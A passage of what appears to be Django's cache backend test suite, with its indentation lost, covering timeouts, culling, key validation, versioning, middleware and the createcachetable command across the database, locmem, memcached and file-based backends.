cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
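    # Minimal sketch of the convention exercised above (an illustration of how
    # a memcached-style backend might normalise long timeouts, not Django's
    # actual implementation):
    #
    #   import time
    #   MEMCACHE_MAX_RELATIVE = 60 * 60 * 24 * 30  # 30 days
    #   def backend_expiry(timeout):
    #       if timeout > MEMCACHE_MAX_RELATIVE:
    #           return int(time.time()) + timeout  # absolute Unix timestamp
    #       return timeout                         # relative offset in seconds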
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
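    # Background on the expected survivor counts above (a summary of the
    # documented MAX_ENTRIES/CULL_FREQUENCY semantics, not of any backend's
    # internals): the 'cull' alias keeps the default CULL_FREQUENCY of 3, so an
    # overflow evicts roughly a third of the entries and most keys survive,
    # while 'zero_cull' sets CULL_FREQUENCY=0, which empties the cache entirely
    # on overflow, leaving only the keys written after the last flush.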
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
def test_get_or_set_version(self):
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian')
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = six.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
        self.assertTrue(os.path.exists(self.dirname))
def test_cache_write_unpicklable_type(self):
# This fails if not using the highest pickling protocol on Python 2.
cache.set('unpicklable', UnpicklableType())
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
        del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
